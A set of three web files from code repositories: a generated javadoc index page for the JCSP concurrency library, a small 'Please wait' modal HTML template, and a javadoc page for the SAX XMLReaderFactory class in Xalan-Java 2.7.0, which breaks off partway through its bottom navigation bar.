jcsp-1.1-rc4/jcsp-core-doc/index-files/index-5.html | rubemkalebe/SalaoBelezaPura | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.5.0_16) on Sun Jan 25 20:01:22 GMT 2009 -->
<TITLE>
E-Index (CSP for Java (JCSP) 1.1-rc4 API Specification)
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
parent.document.title="E-Index (CSP for Java (JCSP) 1.1-rc4 API Specification)";
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Package</FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Index</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
<b>CSP for Java<br>(JCSP) 1.1-rc4</b></EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="index-4.html"><B>PREV LETTER</B></A>
<A HREF="index-6.html"><B>NEXT LETTER</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../index.html?index-filesindex-5.html" target="_top"><B>FRAMES</B></A>
<A HREF="index-5.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<A HREF="index-1.html">A</A> <A HREF="index-2.html">B</A> <A HREF="index-3.html">C</A> <A HREF="index-4.html">D</A> <A HREF="index-5.html">E</A> <A HREF="index-6.html">F</A> <A HREF="index-7.html">G</A> <A HREF="index-8.html">H</A> <A HREF="index-9.html">I</A> <A HREF="index-10.html">J</A> <A HREF="index-11.html">M</A> <A HREF="index-12.html">N</A> <A HREF="index-13.html">O</A> <A HREF="index-14.html">P</A> <A HREF="index-15.html">R</A> <A HREF="index-16.html">S</A> <A HREF="index-17.html">T</A> <A HREF="index-18.html">U</A> <A HREF="index-19.html">V</A> <A HREF="index-20.html">W</A> <A HREF="index-21.html">X</A> <A HREF="index-22.html">Z</A> <HR>
<A NAME="_E_"><!-- --></A><H2>
<B>E</B></H2>
<DL>
<DT><A HREF="../org/jcsp/util/ChannelDataStore.html#EMPTY"><B>EMPTY</B></A> -
Static variable in interface org.jcsp.util.<A HREF="../org/jcsp/util/ChannelDataStore.html" title="interface in org.jcsp.util">ChannelDataStore</A>
<DD>Indicates that the <TT>ChannelDataStore</TT> is empty
-- it can accept only a <TT>put</TT>.
<DT><A HREF="../org/jcsp/util/ints/ChannelDataStoreInt.html#EMPTY"><B>EMPTY</B></A> -
Static variable in interface org.jcsp.util.ints.<A HREF="../org/jcsp/util/ints/ChannelDataStoreInt.html" title="interface in org.jcsp.util.ints">ChannelDataStoreInt</A>
<DD>Indicates that the <TT>ChannelDataStoreInt</TT> is empty
-- it can accept only a <TT>put</TT>.
<DT><A HREF="../org/jcsp/util/Buffer.html#endGet()"><B>endGet()</B></A> -
Method in class org.jcsp.util.<A HREF="../org/jcsp/util/Buffer.html" title="class in org.jcsp.util">Buffer</A>
<DD>Removes the oldest object from the buffer.
<DT><A HREF="../org/jcsp/util/ChannelDataStore.html#endGet()"><B>endGet()</B></A> -
Method in interface org.jcsp.util.<A HREF="../org/jcsp/util/ChannelDataStore.html" title="interface in org.jcsp.util">ChannelDataStore</A>
<DD>Ends an extended read on the buffer.
<DT><A HREF="../org/jcsp/util/InfiniteBuffer.html#endGet()"><B>endGet()</B></A> -
Method in class org.jcsp.util.<A HREF="../org/jcsp/util/InfiniteBuffer.html" title="class in org.jcsp.util">InfiniteBuffer</A>
<DD>Removes the oldest object from the buffer.
<DT><A HREF="../org/jcsp/util/ints/BufferInt.html#endGet()"><B>endGet()</B></A> -
Method in class org.jcsp.util.ints.<A HREF="../org/jcsp/util/ints/BufferInt.html" title="class in org.jcsp.util.ints">BufferInt</A>
<DD>Removes the oldest integer from the buffer.
<DT><A HREF="../org/jcsp/util/ints/ChannelDataStoreInt.html#endGet()"><B>endGet()</B></A> -
Method in interface org.jcsp.util.ints.<A HREF="../org/jcsp/util/ints/ChannelDataStoreInt.html" title="interface in org.jcsp.util.ints">ChannelDataStoreInt</A>
<DD>Ends an extended read on the buffer.
<DT><A HREF="../org/jcsp/util/ints/InfiniteBufferInt.html#endGet()"><B>endGet()</B></A> -
Method in class org.jcsp.util.ints.<A HREF="../org/jcsp/util/ints/InfiniteBufferInt.html" title="class in org.jcsp.util.ints">InfiniteBufferInt</A>
<DD>Removes the oldest integer from the buffer.
<DT><A HREF="../org/jcsp/util/ints/OverFlowingBufferInt.html#endGet()"><B>endGet()</B></A> -
Method in class org.jcsp.util.ints.<A HREF="../org/jcsp/util/ints/OverFlowingBufferInt.html" title="class in org.jcsp.util.ints">OverFlowingBufferInt</A>
<DD>Removes the oldest integer from the buffer.
<DT><A HREF="../org/jcsp/util/ints/OverWriteOldestBufferInt.html#endGet()"><B>endGet()</B></A> -
Method in class org.jcsp.util.ints.<A HREF="../org/jcsp/util/ints/OverWriteOldestBufferInt.html" title="class in org.jcsp.util.ints">OverWriteOldestBufferInt</A>
<DD>See <A HREF="../org/jcsp/util/ints/OverWriteOldestBufferInt.html#startGet()"><CODE>OverWriteOldestBufferInt.startGet()</CODE></A> for a description of the semantics of this method.
<DT><A HREF="../org/jcsp/util/ints/OverWritingBufferInt.html#endGet()"><B>endGet()</B></A> -
Method in class org.jcsp.util.ints.<A HREF="../org/jcsp/util/ints/OverWritingBufferInt.html" title="class in org.jcsp.util.ints">OverWritingBufferInt</A>
<DD>See <A HREF="../org/jcsp/util/ints/OverWritingBufferInt.html#startGet()"><CODE>OverWritingBufferInt.startGet()</CODE></A> for a description of the semantics of this method.
<DT><A HREF="../org/jcsp/util/ints/ZeroBufferInt.html#endGet()"><B>endGet()</B></A> -
Method in class org.jcsp.util.ints.<A HREF="../org/jcsp/util/ints/ZeroBufferInt.html" title="class in org.jcsp.util.ints">ZeroBufferInt</A>
<DD>Ends the extended rendezvous by clearing the buffer.
<DT><A HREF="../org/jcsp/util/OverFlowingBuffer.html#endGet()"><B>endGet()</B></A> -
Method in class org.jcsp.util.<A HREF="../org/jcsp/util/OverFlowingBuffer.html" title="class in org.jcsp.util">OverFlowingBuffer</A>
<DD>Removes the oldest object from the buffer.
<DT><A HREF="../org/jcsp/util/OverWriteOldestBuffer.html#endGet()"><B>endGet()</B></A> -
Method in class org.jcsp.util.<A HREF="../org/jcsp/util/OverWriteOldestBuffer.html" title="class in org.jcsp.util">OverWriteOldestBuffer</A>
<DD>This ends an extended rendezvous by the reader.
<DT><A HREF="../org/jcsp/util/OverWritingBuffer.html#endGet()"><B>endGet()</B></A> -
Method in class org.jcsp.util.<A HREF="../org/jcsp/util/OverWritingBuffer.html" title="class in org.jcsp.util">OverWritingBuffer</A>
<DD>This ends an extended rendezvous by the reader.
<DT><A HREF="../org/jcsp/util/ZeroBuffer.html#endGet()"><B>endGet()</B></A> -
Method in class org.jcsp.util.<A HREF="../org/jcsp/util/ZeroBuffer.html" title="class in org.jcsp.util">ZeroBuffer</A>
<DD>Ends the extended rendezvous by clearing the buffer.
<DT><A HREF="../org/jcsp/lang/AltingChannelInputWrapper.html#endRead()"><B>endRead()</B></A> -
Method in class org.jcsp.lang.<A HREF="../org/jcsp/lang/AltingChannelInputWrapper.html" title="class in org.jcsp.lang">AltingChannelInputWrapper</A>
<DD><B>Deprecated.</B> Ends an extended rendezvous
<DT><A HREF="../org/jcsp/lang/ChannelInput.html#endRead()"><B>endRead()</B></A> -
Method in interface org.jcsp.lang.<A HREF="../org/jcsp/lang/ChannelInput.html" title="interface in org.jcsp.lang">ChannelInput</A>
<DD>End an extended rendezvous.
<DT><A HREF="../org/jcsp/lang/ChannelInputInt.html#endRead()"><B>endRead()</B></A> -
Method in interface org.jcsp.lang.<A HREF="../org/jcsp/lang/ChannelInputInt.html" title="interface in org.jcsp.lang">ChannelInputInt</A>
<DD>End an extended rendezvous.
<DT><A HREF="../org/jcsp/lang/ChannelInputWrapper.html#endRead()"><B>endRead()</B></A> -
Method in class org.jcsp.lang.<A HREF="../org/jcsp/lang/ChannelInputWrapper.html" title="class in org.jcsp.lang">ChannelInputWrapper</A>
<DD><B>Deprecated.</B> Ends an extended rendezvous
<DT><A HREF="../org/jcsp/lang/Crew.html#endRead()"><B>endRead()</B></A> -
Method in class org.jcsp.lang.<A HREF="../org/jcsp/lang/Crew.html" title="class in org.jcsp.lang">Crew</A>
<DD>This must be invoked <I>after</I> any read operations on the associated shared resource.
<DT><A HREF="../org/jcsp/lang/Crew.html#endWrite()"><B>endWrite()</B></A> -
Method in class org.jcsp.lang.<A HREF="../org/jcsp/lang/Crew.html" title="class in org.jcsp.lang">Crew</A>
<DD>This must be invoked <I>after</I> any write operations on the associated shared resource.
<DT><A HREF="../org/jcsp/lang/AltingBarrier.html#enroll()"><B>enroll()</B></A> -
Method in class org.jcsp.lang.<A HREF="../org/jcsp/lang/AltingBarrier.html" title="class in org.jcsp.lang">AltingBarrier</A>
<DD>A process may enroll only if it is resigned.
<DT><A HREF="../org/jcsp/lang/Barrier.html#enroll()"><B>enroll()</B></A> -
Method in class org.jcsp.lang.<A HREF="../org/jcsp/lang/Barrier.html" title="class in org.jcsp.lang">Barrier</A>
<DD>A process may enroll only if it is resigned.
<DT><A HREF="../org/jcsp/lang/AltingBarrier.html#expand(int)"><B>expand(int)</B></A> -
Method in class org.jcsp.lang.<A HREF="../org/jcsp/lang/AltingBarrier.html" title="class in org.jcsp.lang">AltingBarrier</A>
<DD>This expands the number of processes enrolled in this <i>alting</i> barrier.
<DT><A HREF="../org/jcsp/lang/AltingBarrier.html#expand()"><B>expand()</B></A> -
Method in class org.jcsp.lang.<A HREF="../org/jcsp/lang/AltingBarrier.html" title="class in org.jcsp.lang">AltingBarrier</A>
<DD>This expands by one the number of processes enrolled in this <i>alting</i>
barrier.
<DT><A HREF="../org/jcsp/awt/Display.html#extend(org.jcsp.awt.GraphicsCommand[])"><B>extend(GraphicsCommand[])</B></A> -
Method in interface org.jcsp.awt.<A HREF="../org/jcsp/awt/Display.html" title="interface in org.jcsp.awt">Display</A>
<DD>Extends the array of <TT>GraphicsCommand</TT>s to be interpreted.
<DT><A HREF="../org/jcsp/awt/Display.html#extend(org.jcsp.awt.GraphicsCommand)"><B>extend(GraphicsCommand)</B></A> -
Method in interface org.jcsp.awt.<A HREF="../org/jcsp/awt/Display.html" title="interface in org.jcsp.awt">Display</A>
<DD>Extends the array of <TT>GraphicsCommand</TT>s to be executed by one command.
<DT><A HREF="../org/jcsp/awt/DisplayList.html#extend(org.jcsp.awt.GraphicsCommand[])"><B>extend(GraphicsCommand[])</B></A> -
Method in class org.jcsp.awt.<A HREF="../org/jcsp/awt/DisplayList.html" title="class in org.jcsp.awt">DisplayList</A>
<DD>Extends the array of <TT>GraphicsCommand</TT>s to be executed.
<DT><A HREF="../org/jcsp/awt/DisplayList.html#extend(org.jcsp.awt.GraphicsCommand)"><B>extend(GraphicsCommand)</B></A> -
Method in class org.jcsp.awt.<A HREF="../org/jcsp/awt/DisplayList.html" title="class in org.jcsp.awt">DisplayList</A>
<DD>Extends the array of <TT>GraphicsCommand</TT>s to be executed by one command.
</DL>
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Package</FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Index</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
<b>CSP for Java<br>(JCSP) 1.1-rc4</b></EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="index-4.html"><B>PREV LETTER</B></A>
<A HREF="index-6.html"><B>NEXT LETTER</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../index.html?index-filesindex-5.html" target="_top"><B>FRAMES</B></A>
<A HREF="index-5.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<A HREF="index-1.html">A</A> <A HREF="index-2.html">B</A> <A HREF="index-3.html">C</A> <A HREF="index-4.html">D</A> <A HREF="index-5.html">E</A> <A HREF="index-6.html">F</A> <A HREF="index-7.html">G</A> <A HREF="index-8.html">H</A> <A HREF="index-9.html">I</A> <A HREF="index-10.html">J</A> <A HREF="index-11.html">M</A> <A HREF="index-12.html">N</A> <A HREF="index-13.html">O</A> <A HREF="index-14.html">P</A> <A HREF="index-15.html">R</A> <A HREF="index-16.html">S</A> <A HREF="index-17.html">T</A> <A HREF="index-18.html">U</A> <A HREF="index-19.html">V</A> <A HREF="index-20.html">W</A> <A HREF="index-21.html">X</A> <A HREF="index-22.html">Z</A> <HR>
<font size=\'-1\'><A HREF=\'mailto:jcsp-team@kent.ac.uk\'>Submit a bug or feature to jcsp-team@kent.ac.uk</A><br>Version 1.1-rc4 of the JCSP API Specification (Copyright 1997-2008 P.D.Austin and P.H.Welch - All Rights Reserved)<br>Java is a trademark or registered trademark of Sun Microsystems, Inc. in the US and other countries.
</BODY>
</HTML>
|
http/template/wait.html | nicksellen/iznik | <div class="modal fade" tabindex="-1">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h4 class="modal-title js-modal-title text-center">Please wait...</h4>
</div>
<div class="modal-body js-modal-body">
<div class="row">
<div class="col-md-2 col-md-offset-5 text-center">
<img alt="Loader" id="js-modalloader" style="display: none" src="/images/loadermodal.gif" />
</div>
</div>
</div>
</div>
</div>
</div> |
lib/xalan-j_2_7_0/docs/apidocs/org/xml/sax/helpers/XMLReaderFactory.html | MrStaticVoid/iriverter | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc on Sat Aug 06 17:05:06 EDT 2005 -->
<TITLE>
Xalan-Java 2.7.0: Class XMLReaderFactory
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style">
</HEAD>
<BODY BGCOLOR="white">
<!-- ========== START OF NAVBAR ========== -->
<A NAME="navbar_top"><!-- --></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/XMLReaderFactory.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../org/xml/sax/helpers/XMLReaderAdapter.html"><B>PREV CLASS</B></A>
NEXT CLASS</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../index.html" TARGET="_top"><B>FRAMES</B></A>
<A HREF="XMLReaderFactory.html" TARGET="_top"><B>NO FRAMES</B></A></FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: INNER | FIELD | CONSTR | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: FIELD | CONSTR | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<!-- =========== END OF NAVBAR =========== -->
<HR>
<!-- ======== START OF CLASS DATA ======== -->
<H2>
<FONT SIZE="-1">
org.xml.sax.helpers</FONT>
<BR>
Class XMLReaderFactory</H2>
<PRE>
java.lang.Object
|
+--<B>org.xml.sax.helpers.XMLReaderFactory</B>
</PRE>
<HR>
<DL>
<DT>public final class <B>XMLReaderFactory</B><DT>extends java.lang.Object</DL>
<P>
Factory for creating an XML reader.
<blockquote>
<em>This module, both source code and documentation, is in the
Public Domain, and comes with <strong>NO WARRANTY</strong>.</em>
See <a href='http://www.saxproject.org'>http://www.saxproject.org</a>
for further information.
</blockquote>
<p>This class contains static methods for creating an XML reader
from an explicit class name, or based on runtime defaults:</p>
<pre>
try {
XMLReader myReader = XMLReaderFactory.createXMLReader();
} catch (SAXException e) {
System.err.println(e.getMessage());
}
</pre>
<p><strong>Note to Distributions bundled with parsers:</strong>
You should modify the implementation of the no-arguments
<em>createXMLReader</em> to handle cases where the external
configuration mechanisms aren't set up. That method should do its
best to return a parser when one is in the class path, even when
nothing bound its class name to <code>org.xml.sax.driver</code> so
those configuration mechanisms would see it.</p>
<P>
<DL>
<DT><B>Since: </B><DD>SAX 2.0</DD>
</DL>
<HR>
<P>
<!-- ======== INNER CLASS SUMMARY ======== -->
<!-- =========== FIELD SUMMARY =========== -->
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<!-- ========== METHOD SUMMARY =========== -->
<A NAME="method_summary"><!-- --></A>
<TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=2><FONT SIZE="+2">
<B>Method Summary</B></FONT></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static <A HREF="../../../../org/xml/sax/XMLReader.html">XMLReader</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/xml/sax/helpers/XMLReaderFactory.html#createXMLReader()">createXMLReader</A></B>()</CODE>
<BR>
Attempt to create an XMLReader from system defaults.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static <A HREF="../../../../org/xml/sax/XMLReader.html">XMLReader</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/xml/sax/helpers/XMLReaderFactory.html#createXMLReader(java.lang.String)">createXMLReader</A></B>(java.lang.String className)</CODE>
<BR>
Attempt to create an XML reader from a class name.</TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A>
<TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TD><B>Methods inherited from class java.lang.Object</B></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE>equals,
getClass,
hashCode,
notify,
notifyAll,
toString,
wait,
wait,
wait</CODE></TD>
</TR>
</TABLE>
<P>
<!-- ============ FIELD DETAIL =========== -->
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<!-- ============ METHOD DETAIL ========== -->
<A NAME="method_detail"><!-- --></A>
<TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=1><FONT SIZE="+2">
<B>Method Detail</B></FONT></TD>
</TR>
</TABLE>
<A NAME="createXMLReader()"><!-- --></A><H3>
createXMLReader</H3>
<PRE>
public static <A HREF="../../../../org/xml/sax/XMLReader.html">XMLReader</A> <B>createXMLReader</B>()
throws <A HREF="../../../../org/xml/sax/SAXException.html">SAXException</A></PRE>
<DL>
<DD>Attempt to create an XMLReader from system defaults.
In environments which can support it, the name of the XMLReader
class is determined by trying each these options in order, and
using the first one which succeeds:</p> <ul>
<li>If the system property <code>org.xml.sax.driver</code>
has a value, that is used as an XMLReader class name. </li>
<li>The JAR "Services API" is used to look for a class name
in the <em>META-INF/services/org.xml.sax.driver</em> file in
jarfiles available to the runtime.</li>
<li> SAX parser distributions are strongly encouraged to provide
a default XMLReader class name that will take effect only when
previous options (on this list) are not successful.</li>
<li>Finally, if <A HREF="../../../../org/xml/sax/helpers/ParserFactory.html#makeParser()"><CODE>ParserFactory.makeParser()</CODE></A> can
return a system default SAX1 parser, that parser is wrapped in
a <A HREF="../../../../org/xml/sax/helpers/ParserAdapter.html"><CODE>ParserAdapter</CODE></A>. (This is a migration aid for SAX1
environments, where the <code>org.xml.sax.parser</code> system
property will often be usable.) </li>
</ul>
<p> In environments such as small embedded systems, which can not
support that flexibility, other mechanisms to determine the default
may be used. </p>
<p>Note that many Java environments allow system properties to be
initialized on a command line. This means that <em>in most cases</em>
setting a good value for that property ensures that calls to this
method will succeed, except when security policies intervene.
This will also maximize application portability to older SAX
environments, with less robust implementations of this method.
</p><DD><DL>
<DT><B>Returns:</B><DD>A new XMLReader.<DT><B>Throws:</B><DD><A HREF="../../../../org/xml/sax/SAXException.html">SAXException</A> - If no default XMLReader class
can be identified and instantiated.<DT><B>See Also: </B><DD><A HREF="../../../../org/xml/sax/helpers/XMLReaderFactory.html#createXMLReader(java.lang.String)"><CODE>createXMLReader(java.lang.String)</CODE></A></DL>
</DD>
</DL>
<HR>
<A NAME="createXMLReader(java.lang.String)"><!-- --></A><H3>
createXMLReader</H3>
<PRE>
public static <A HREF="../../../../org/xml/sax/XMLReader.html">XMLReader</A> <B>createXMLReader</B>(java.lang.String className)
throws <A HREF="../../../../org/xml/sax/SAXException.html">SAXException</A></PRE>
<DL>
<DD>Attempt to create an XML reader from a class name.
<p>Given a class name, this method attempts to load
and instantiate the class as an XML reader.</p>
<p>Note that this method will not be usable in environments where
the caller (perhaps an applet) is not permitted to load classes
dynamically.</p><DD><DL>
<DT><B>Returns:</B><DD>A new XML reader.<DT><B>Throws:</B><DD><A HREF="../../../../org/xml/sax/SAXException.html">SAXException</A> - If the class cannot be
loaded, instantiated, and cast to XMLReader.<DT><B>See Also: </B><DD><A HREF="../../../../org/xml/sax/helpers/XMLReaderFactory.html#createXMLReader()"><CODE>createXMLReader()</CODE></A></DL>
</DD>
</DL>
<!-- ========= END OF CLASS DATA ========= -->
<HR>
<!-- ========== START OF NAVBAR ========== -->
<A NAME="navbar_bottom"><!-- --></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/XMLReaderFactory.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../org/xml/sax/helpers/XMLReaderAdapter.html"><B>PREV CLASS</B></A>
NEXT CLASS</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../index.html" TARGET="_top"><B>FRAMES</B></A>
<A HREF="XMLReaderFactory.html" TARGET="_top"><B>NO FRAMES</B></A></FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: INNER | FIELD | CONSTR | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
